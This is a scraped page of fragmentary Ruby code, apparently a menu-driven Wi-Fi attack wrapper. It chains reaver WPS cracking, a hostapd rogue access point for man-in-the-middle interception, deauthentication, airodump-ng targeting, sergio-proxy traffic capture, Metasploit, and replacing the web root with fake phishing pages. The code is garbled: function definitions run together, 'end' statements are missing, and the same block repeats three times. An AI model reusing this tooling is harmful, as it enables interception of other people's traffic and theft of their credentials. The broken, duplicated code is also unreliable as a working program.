def wpsputs("Reaver with ten seconds between two request on the acces point.WARNING if reaver is not installed yet in the system you have to go here: http://www.linuxtrack.com/t1427-Installer-Reaver-sur-Ubuntu.htm and follow the instructions")sleep 20

def sergioputs("MAKE SURE THE FORWADING IS ENABLED (echo 1 > /proc/sys/net/ipv4/ip_forward) Sergio is a powerful proxy open source and easy to use for capture any traffic in the web! for more information and download go to https://code.google.com/p/sergio-proxy/ special thanks to Antares145 and his tuto, can be found here: http://antaresnotebook.wordpress.com/2013/03/31/tuto-rogue-ap-episode-2-sniffing-de-base-et-un-peu-de-fun/")sleep 40system ("ifconfig") puts "Enter your ip adress"ip=""ip=gets.chompip=ip

def hostapd puts("Hostapd access point mode, good to do a MITM more discreet (make sure your hostapd.conf has got a good configuration and the way to the folder is correct. to begin, remove the line driver=hostapd and replace it with driver=nl80211)")system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")end

def deauth system ("ifconfig") puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")carte=""carte=gets.chomp$carte=carte

def planque puts "Airbase can find a hidden network too, you have to wait a little and the network will appear in your airodump-ng windows"sleep 15system("airodump-ng --encrypt wpa mon0")puts "Select the channel of the target network (CH)"ch=""ch=gets.chomp$ch=ch

puts "Select the bssid of the target network (BSSID)"bssid=""bssid=gets.chomp$bssid=bssid

def metasploit puts "BEFORE Lauching metasploit if you are on unbutu or other linux plateform make sure you have all the librairies to run properly metasploit.Lauching msfconsole, this could take a time...wait.Come back to Securethis menu pressing exit in msfconsole"sleep 20system("msfconsole")end

def clean puts "Remove your index.html and php and all css present into /var/www and replace with the new files you choose CTRL+C TO ABORT NOW!"sleep 20`rm /var/www/index.php``rm /var/www/index.html``rm /var/www/valid.php``rm /var/www/*.css``rm /var/www/*.jpg``rm /var/www/*.ico`

puts "Now enter the name of your folder wich countain the fakes pages"name=""name=gets.chomp$name=name

def hostapd puts("Hostapd access point mode, good to do a MITM more discreet (make sure your hostapd.conf has got a good configuration and the way to the folder is correct. to begin, remove the line driver=hostapd and replace it with driver=nl80211)")system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")end

def deauth system ("ifconfig") puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")carte=""carte=gets.chomp$carte=carte

def planque puts "Airbase can find a hidden network too, you have to wait a little and the network will appear in your airodump-ng windows"sleep 15system("airodump-ng --encrypt wpa mon0")puts "Select the channel of the target network (CH)"ch=""ch=gets.chomp$ch=ch

puts "Select the bssid of the target network (BSSID)"bssid=""bssid=gets.chomp$bssid=bssid

def metasploit puts "BEFORE Lauching metasploit if you are on unbutu or other linux plateform make sure you have all the librairies to run properly metasploit.Lauching msfconsole, this could take a time...wait.Come back to Securethis menu pressing exit in msfconsole"sleep 20system("msfconsole")end

def clean puts "Remove your index.html and php and all css present into /var/www and replace with the new files you choose CTRL+C TO ABORT NOW!"sleep 20`rm /var/www/index.php``rm /var/www/index.html``rm /var/www/valid.php``rm /var/www/*.css``rm /var/www/*.jpg``rm /var/www/*.ico`

puts "Now enter the name of your folder wich countain the fakes pages"name=""name=gets.chomp$name=name

def wpsputs("Reaver with ten seconds between two request on the acces point.WARNING if reaver is not installed yet in the system you have to go here: http://www.linuxtrack.com/t1427-Installer-Reaver-sur-Ubuntu.htm and follow the instructions")sleep 20

def sergioputs("MAKE SURE THE FORWADING IS ENABLED (echo 1 > /proc/sys/net/ipv4/ip_forward) Sergio is a powerful proxy open source and easy to use for capture any traffic in the web! for more information and download go to https://code.google.com/p/sergio-proxy/ special thanks to Antares145 and his tuto, can be found here: http://antaresnotebook.wordpress.com/2013/03/31/tuto-rogue-ap-episode-2-sniffing-de-base-et-un-peu-de-fun/")sleep 40system ("ifconfig") puts "Enter your ip adress"ip=""ip=gets.chompip=ip

def hostapd puts("Hostapd access point mode, good to do a MITM more discreet (make sure your hostapd.conf has got a good configuration and the way to the folder is correct. to begin, remove the line driver=hostapd and replace it with driver=nl80211)")system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")end

def deauth system ("ifconfig") puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")carte=""carte=gets.chomp$carte=carte

def planque puts "Airbase can find a hidden network too, you have to wait a little and the network will appear in your airodump-ng windows"sleep 15system("airodump-ng --encrypt wpa mon0")puts "Select the channel of the target network (CH)"ch=""ch=gets.chomp$ch=ch

puts "Select the bssid of the target network (BSSID)"bssid=""bssid=gets.chomp$bssid=bssid

def metasploit puts "BEFORE Lauching metasploit if you are on unbutu or other linux plateform make sure you have all the librairies to run properly metasploit.Lauching msfconsole, this could take a time...wait.Come back to Securethis menu pressing exit in msfconsole"sleep 20system("msfconsole")end

def clean puts "Remove your index.html and php and all css present into /var/www and replace with the new files you choose CTRL+C TO ABORT NOW!"sleep 20`rm /var/www/index.php``rm /var/www/index.html``rm /var/www/valid.php``rm /var/www/*.css``rm /var/www/*.jpg``rm /var/www/*.ico`

puts "Now enter the name of your folder wich countain the fakes pages"name=""name=gets.chomp$name=name

We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners. See details.
Learn more